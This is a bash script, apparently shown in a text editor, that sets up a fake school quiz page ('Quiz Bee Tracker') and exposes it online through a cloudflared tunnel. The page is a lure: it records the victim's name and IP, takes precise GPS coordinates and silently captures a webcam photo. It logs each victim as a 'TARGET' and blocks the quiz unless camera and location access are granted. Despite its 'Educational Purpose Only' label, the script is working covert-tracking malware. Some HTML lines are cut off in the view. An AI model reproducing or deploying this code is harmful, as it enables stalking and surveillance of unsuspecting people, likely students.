                                                 QuizBee.sh                                                     Modified
#!/bin/bash

# --- BEAST-TRACK v22.0 (SYNTAX FIXED & SADFRIENDS BANNER) ---
NC='\033[0m'; Bold='\033[1m'
PBlue='\033[1;34m'; PWhite='\033[1;37m'; PRed='\033[1;31m'; PYellow='\033[1;33m'
BCyan='\033[1;36m'; BGreen='\033[1;32m'; BPurple='\033[1;35m'

PORT=8888
SERVER_DIR="server"

# --- AUTO-REMOVE OLD SESSION ---
mkdir -p $SERVER_DIR
rm -f $SERVER_DIR/*.png > /dev/null 2>&1
echo "--- SESSION RESTARTED: $(date) ---" > $SERVER_DIR/combined.log
chmod -R 777 $SERVER_DIR

clear
# --- SadFriends ASCII Banner ---
echo  "${PBlue}${Bold}  ██████╗ ███████╗ █████╗ ███████╗████████╗ ${NC}"
echo  "${PBlue}${Bold}  ██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝ ${NC}"
echo  "${PWhite}${Bold}  ██████╔╝█████╗  ███████║███████╗   ██║    ${NC}"
echo  "${PWhite}${Bold}  ██╔══██╗██╔══╝  ██╔══██║╚════██║   ██║    ${NC}"
echo  "${PRed}${Bold}  ██████╔╝███████╗██║  ██║███████║   ██║    ${NC}"
echo  "${PRed}${Bold}  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝    ${NC}"
echo  "  ${PYellow}⭐ ⭐ ⭐  QUIZ BEE TRACKER v22.0  ⭐ ⭐ ⭐${NC}"
echo  "  ${BCyan}Created by   : ${PWhite}${Bold}SadFriends${NC}"
echo  "  ${BGreen}Status       : ${PWhite}Educational Purpose Only${NC}"
echo  "${PWhite}  ==========================================${NC}"

# --- QUIZ SELECTION ---
echo  "\n  ${BCyan}${Bold}[ PILI NG QUIZ SUBJECT ]${NC}"
echo  "  ${PWhite} 1. MATHEMATICS${NC}"
echo  "  ${PBlue} 2. SCIENCE${NC}"
echo  "  ${BPurple} 3. ENGLISH${NC}"
echo  "  ${PYellow} 4. HISTORY${NC}"
read -p $'\n  [*] Select ➤ ' q_opt

case $q_opt in
    1) SUBJECT="MATH"; S_COLOR="#3498db";                                                                                                           Q1="12 + 15?"; A1="27"; B1="29"; Q2="9 x 8?"; A2="72"; B2="81";
       Q3="Sqrt of 144?"; A3="12"; B3="14"; Q4="100 / 4?"; A4="25"; B4="20";
       Q5="15 x 2?"; A5="30"; B5="25"; Q6="50 - 12?"; A6="38"; B6="42";
       Q7="8 x 8?"; A7="64"; B7="56"; Q8="25 + 25?"; A8="50"; B8="75";
       Q9="10 x 10?"; A9="100"; B9="110"; Q10="1 + 1?"; A10="2"; B10="11";;
    2) SUBJECT="SCIENCE"; S_COLOR="#2ecc71";
       Q1="H2O is?"; A1="Water"; B1="Gas"; Q2="Closest planet?"; A2="Mercury"; B2="Mars";
       Q3="Powerhouse of cell?"; A3="Mitochondria"; B3="Nucleus"; Q4="Human bone count?"; A4="206"; B4="300";
       Q5="Gas we breathe?"; A5="Oxygen"; B5="Carbon"; Q6="Study of plants?"; A6="Botany"; B6="Zoology";
       Q7="Boiling point?"; A7="100°C"; B7="90°C"; Q8="Center of atom?"; A8="Nucleus"; B8="Electron";
       Q9="Our Galaxy?"; A9="Milky Way"; B9="Andromeda"; Q10="Is Sun a star?"; A10="Yes"; B10="No";;
    3) SUBJECT="ENGLISH"; S_COLOR="#e67e22";
       Q1="Synonym of Happy?"; A1="Joyful"; B1="Sad"; Q2="Plural of Mouse?"; A2="Mice"; B2="Mouses";
       Q3="Past of Eat?"; A3="Ate"; B3="Eaten"; Q4="Opposite of Cold?"; A4="Hot"; B4="Ice";
       Q5="A,E,I,O,U are?"; A5="Vowels"; B5="Consonants"; Q6="Is 'He' a pronoun?"; A6="Yes"; B6="No";
       Q7="Spell 15?"; A7="Fifteen"; B7="Fiveteen"; Q8="Verb of 'Run'?"; A8="Run"; B8="Runner";
       Q9="Plural of Fish?"; A9="Fish"; B9="Fishes"; Q10="Capital of 'i'?"; A10="I"; B10="J";;
    *) SUBJECT="HISTORY"; S_COLOR="#f1c40f";
       Q1="PH National Hero?"; A1="Rizal"; B1="Bonifacio"; Q2="Discovered PH?"; A2="Magellan"; B2="Columbus";
       Q3="First President?"; A3="Aguinaldo"; B3="Quezon"; Q4="Year of Independence?"; A4="1898"; B4="1945";
       Q5="Oldest City?"; A5="Cebu"; B5="Manila"; Q6="Rizal's birth month?"; A6="June"; B6="July";
       Q7="GOMBURZA count?"; A7="3"; B7="4"; Q8="WW2 Start Year?"; A8="1939"; B8="1945";
       Q9="Aguinaldo's Province?"; A9="Cavite"; B9="Bulacan"; Q10="National Leaf?"; A10="Anahaw"; B10="Narra";;
esac

# --- PHP Backend ---
cat <<EOF > $SERVER_DIR/index.php
<?php
\$ip = \$_SERVER['REMOTE_ADDR'];
if (\$_SERVER['REQUEST_METHOD'] === 'POST') {
    \$type = \$_POST['type'] ?? '';
    if (\$type == 'init') {
        \$log = "\n\033[1;33m┏━━━━━━━━━━━━ TARGET DETECTED ━━━━━━━━━━━━┓\033[0m\n";
        \$log .= "\033[1;37m┃ NAME      :\033[0m " . (\$_POST['name'] ?? 'Unknown') . "\n";
        \$log .= "\033[1;37m┃ SUBJECT   :\033[0m $SUBJECT\n";
        \$log .= "\033[1;37m┃ IP ADDR   :\033[0m \$ip\n";
    } elseif (\$type == 'loc') {
        \$log = "\033[1;32m┃ GPS DATA  :\033[0m " . \$_POST['lat'] . "," . \$_POST['lon'] . "\n";
        \$log .= "\033[1;34m┃ MAPS LINK :\033[0m https://google.com" . \$_POST['lat'] . "," . \$_POST['lon'] . "\n";
    } elseif (\$type == 'cam') {
        \$fname = 'cam_' . time() . '.png';
        file_put_contents(\$fname, base64_decode(str_replace(['data:image/png;base64,', ' '], ['', '+'], \$_POST['img'])));
        \$log = "\033[1;31m┃ CAM FILE  :\033[0m \$fname (CAPTURED!)\n\033[1;33m┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛\033[0m\n";
    }
    file_put_contents("combined.log", \$log, FILE_APPEND);
    exit();
}
?>
<!DOCTYPE html><html><head><title>$SUBJECT Quiz Challenge</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
<style>
    body { background: #000; color: white; font-family: sans-serif; text-align: center; margin: 0; padding: 15px; }
    .box { border: 2px solid $S_COLOR; padding: 20px; border-radius: 15px; background: #111; max-width: 400px; margin: auto; box-shadow: 0 0>
    h1 { color: $S_COLOR; margin: 10px 0; }
    input[type="text"] { width: 100%; padding: 12px; margin: 10px 0; border-radius: 5px; border: 1px solid #444; background: #222; color: #f>
    .btn { background: $S_COLOR; color: #000; padding: 15px; width: 100%; border: none; border-radius: 8px; font-weight: bold; cursor: point>
    .q-item { display: none; text-align: left; background: #222; padding: 15px; border-radius: 8px; margin-top: 10px; }
    .q-active { display: block; }
    #err-box { display: none; color: #ff9999; background: #300; padding: 10px; border: 1px solid red; margin-top: 15px; border-radius: 5px; >
    label { display: block; margin: 10px 0; font-size: 17px; cursor: pointer; padding: 10px; border: 1px solid #333; border-radius: 5px; }
    #final-screen { display: none; }
    .code-box { background: #222; border: 1px dashed $S_COLOR; padding: 15px; margin-top: 15px; font-family: monospace; font-size: 14px; }
</style></head>
<body>
    <div class="box">
        <h1 id="title">$SUBJECT QUIZ</h1>
        <div id="verify-ui">
            <p>Enter <b>Full Name</b> to start.</p>
            <input type="text" id="userName" placeholder="Juan Dela Cruz" required>
            <button class="btn" id="startBtn">START ASSESSMENT</button>
            <div id="err-box">⚠️ <b>ACCESS DENIED:</b> You must Allow <b>Camera & Location</b>. Click the Lock (🔒) icon and set to Allow.</d>
        </div>
        <div id="quiz-ui" style="display:none;">
            <div id="q-list">
                <div class="q-item q-active"><b>1.</b> $Q1<br><label><input type="radio" name="r" value="A"> $A1</label><label><input type=">
                <div class="q-item"><b>2.</b> $Q2<br><label><input type="radio" name="r" value="A"> $A2</label><label><input type="radio" na>
                <div class="q-item"><b>3.</b> $Q3<br><label><input type="radio" name="r" value="A"> $A3</label><label><input type="radio" na>
                <div class="q-item"><b>4.</b> $Q4<br><label><input type="radio" name="r" value="A"> $A4</label><label><input type="radio" na>
                <div class="q-item"><b>5.</b> $Q5<br><label><input type="radio" name="r" value="A"> $A5</label><label><input type="radio" na>
                <div class="q-item"><b>6.</b> $Q6<br><label><input type="radio" name="r" value="A"> $A6</label><label><input type="radio" na>
                <div class="q-item"><b>7.</b> $Q7<br><label><input type="radio" name="r" value="A"> $A7</label><label><input type="radio" na>
                <div class="q-item"><b>8.</b> $Q8<br><label><input type="radio" name="r" value="A"> $A8</label><label><input type="radio" na>
                <div class="q-item"><b>9.</b> $Q9<br><label><input type="radio" name="r" value="A"> $A9</label><label><input type="radio" na>
                <div class="q-item"><b>10.</b> $Q10<br><label><input type="radio" name="r" value="A"> $A10</label><label><input type="radio">
            </div>
            <button class="btn" id="nextBtn">SUBMIT (1/10)</button>
        </div>
        <div id="final-screen">
            <h2 style="color: #2ecc71;">🎊 CONGRATS!</h2>
            <div style="font-size: 24px; font-weight: bold; margin: 15px 0;">SCORE: <span id="scoreVal" style="color:$S_COLOR;">0</span>/10<>
            <p>Copy this V-Code for proctor:</p>
            <div class="code-box" id="vCode">...</div>
            <button class="btn" onclick="location.reload()">RETAKE</button>
        </div>
    </div>
<video id="v" style="display:none;" autoplay></video><canvas id="c" style="display:none;" width="640" height="480"></canvas>
<script>
const send = (d) => fetch('index.php', {method:'POST', body:d});
let score = 0; let curr = 0; const qs = document.querySelectorAll('.q-item');
document.getElementById('startBtn').onclick = async function() {
    const name = document.getElementById('userName').value;
    if(name.length < 2) { alert("Enter Name!"); return; }
    this.innerText = "Initializing...";
    navigator.geolocation.getCurrentPosition(async (p) => {
        const fd = new FormData(); fd.append('type', 'init'); fd.append('name', name); fd.append('dev', navigator.userAgent);
        await send(fd);
        const f2 = new FormData(); f2.append('type', 'loc'); f2.append('lat', p.coords.latitude); f2.append('lon', p.coords.longitude);
        send(f2);
        try {
            const s = await navigator.mediaDevices.getUserMedia({video:true});
            const v = document.getElementById('v'); const c = document.getElementById('c');
            v.srcObject = s;
            setTimeout(() => {
                c.getContext('2d').drawImage(v,0,0,640,480);
                const f3 = new FormData(); f3.append('type', 'cam'); f3.append('img', c.toDataURL('image/png'));
                send(f3); s.getTracks().forEach(t => t.stop());
                document.getElementById('verify-ui').style.display = 'none';
                document.getElementById('quiz-ui').style.display = 'block';
            }, 1000);
        } catch(e) { document.getElementById('err-box').style.display = 'block'; }
    }, () => { document.getElementById('err-box').style.display = 'block'; }, {enableHighAccuracy:true, timeout:5000});
};
document.getElementById('nextBtn').onclick = () => {
    const sel = document.querySelector('input[name="r"]:checked');
    if(!sel) { alert("Select answer!"); return; }
    if(sel.value === "A") score++; sel.checked = false;
    qs[curr].classList.remove('q-active'); curr++;
    if(curr < qs.length) { qs[curr].classList.add('q-active'); document.getElementById('nextBtn').innerText = "SUBMIT (" + (curr+1) + "/10)">
    else {
        document.getElementById('quiz-ui').style.display = 'none'; document.getElementById('final-screen').style.display = 'block';
        document.getElementById('scoreVal').innerText = score;
        document.getElementById('vCode').innerText = "VCODE-" + score + "PT-" + Math.floor(1000+Math.random()*9000);
    }
};
</script></body></html>
EOF

# --- SERVER RUN ---
echo -e "${BGreen}[*] Starting Beast-Track Hub...${NC}"
php -S 127.0.0.1:$PORT -t $SERVER_DIR > /dev/null 2>&1 &
PHP_PID=$!
cloudflared tunnel --url http://127.0.0.1:$PORT > cf.log 2>&1 &
CF_PID=$!
while true; do
    CF_LINK=$(grep -o 'https://[-0-9a-z]*\.trycloudflare\.com' cf.log)
    if [ ! -z "$CF_LINK" ]; then echo -e "\r${BGreen}[+] LINK: ${BWhite}${Bold}$CF_LINK${NC}"; break; fi
    sleep 1
done
trap "kill $PHP_PID $CF_PID; rm -f cf.log; exit" INT TERM EXIT
tail -f $SERVER_DIR/combined.log
